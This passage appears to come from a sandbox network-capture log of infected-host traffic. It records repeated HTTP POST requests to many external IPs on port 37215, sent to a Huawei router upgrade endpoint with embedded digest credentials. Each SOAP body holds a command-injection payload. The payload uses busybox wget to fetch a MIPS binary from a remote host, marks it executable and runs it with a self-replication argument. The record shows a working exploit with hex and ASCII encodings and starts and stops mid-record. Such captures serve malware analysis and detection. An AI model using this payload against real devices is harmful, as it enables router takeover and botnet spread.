                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1054192.168.2.1359052197.139.200.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501327038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1055192.168.2.1346108157.3.108.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501362085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1056192.168.2.135411241.220.179.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501560926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1057192.168.2.1337504197.25.169.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501593113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1058192.168.2.1345294197.241.125.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501773119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1059192.168.2.1360004157.158.34.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501796007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1060192.168.2.133614641.52.212.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501823902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1061192.168.2.1357260197.21.146.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501852989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1062192.168.2.1355088157.32.150.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502058029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1063192.168.2.1348290157.205.192.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502094030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
